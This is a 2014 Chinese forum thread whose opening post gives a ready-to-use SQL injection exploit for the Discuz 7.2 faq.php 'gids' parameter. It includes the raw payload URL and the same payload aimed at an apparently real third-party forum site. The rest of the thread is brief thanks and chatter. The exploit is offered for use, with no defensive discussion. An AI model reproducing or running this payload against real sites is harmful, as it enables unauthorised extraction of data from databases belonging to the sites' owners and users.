U神V5 发表于 2014-7-2 18:48:52

Discuz 7.2 faq.php SQL注入漏洞

EXP:

http://www.xxx.com/faq.php?action=grouppermission&gids='&gids=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema
.tables group by x)a)%23

如:

http://www.nichijou.cc/bbs/faq.php?action=grouppermission&gids=%27&gids=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23

zy516668272 发表于 2014-7-2 19:27:37

广岛秋泽 发表于 2014-7-2 19:52:41

小白表示看不懂~

随风淡笑 发表于 2014-7-2 20:10:23

支持原创求金币打赏:lol

zy516668272 发表于 2014-7-2 21:21:39

Puppet。 发表于 2014-7-2 23:36:35

Puppet。 发表于 2014-7-2 23:36:57

Dr.ls 发表于 2014-7-3 00:01:27

o8的水印 logo 还是一如既往的丑掉渣

vivi 发表于 2014-7-3 12:36:06

感谢分享

f4ckteam 发表于 2014-7-3 18:01:51

这个也可以试试,这两天好强大吧
页: [1] 2 3
查看完整版本: Discuz 7.2 faq.php SQL注入漏洞